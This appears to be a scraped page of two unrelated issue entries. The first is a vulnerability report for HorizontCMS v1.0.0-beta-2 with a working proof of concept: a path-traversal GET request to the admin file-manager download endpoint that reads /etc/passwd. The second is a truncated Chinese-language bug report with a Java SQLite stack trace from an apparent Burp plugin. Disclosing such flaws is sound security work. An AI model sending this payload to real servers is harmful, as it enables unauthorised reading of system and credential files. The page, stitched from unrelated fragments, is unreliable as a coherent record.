dota-st
dota-st
Version:HorizontCMS v1.0.0-beta-2 Submit date: 2022-02-13 Description:Arbitrary file download vulnerability  POC: ``` GET /admin/file-manager/download?file=storage/images/header_images/../../../../../../../../etc/passwd HTTP/1.1 ``` 
在加载db文件的时候报错: 报错详细信息: java.sql.SQLException: Error opening connection at org.sqlite.core.CoreConnection.open(CoreConnection.java:215) at org.sqlite.core.CoreConnection.(CoreConnection.java:76) at org.sqlite.jdbc3.JDBC3Connection.(JDBC3Connection.java:24) at org.sqlite.jdbc4.JDBC4Connection.(JDBC4Connection.java:23) at org.sqlite.SQLiteConnection.(SQLiteConnection.java:45) at org.sqlite.JDBC.createConnection(JDBC.java:114) at org.sqlite.JDBC.connect(JDBC.java:88) at java.sql/java.sql.DriverManager.getConnection(DriverManager.java:681) at java.sql/java.sql.DriverManager.getConnection(DriverManager.java:252) at burp.Bootstrap.DBHelper.(DBHelper.java:28) at burp.Ui.ProjectTableTag.clickChoiceProjectAction(ProjectTableTag.java:643) at burp.Ui.ProjectTableTag$9.actionPerformed(ProjectTableTag.java:319)...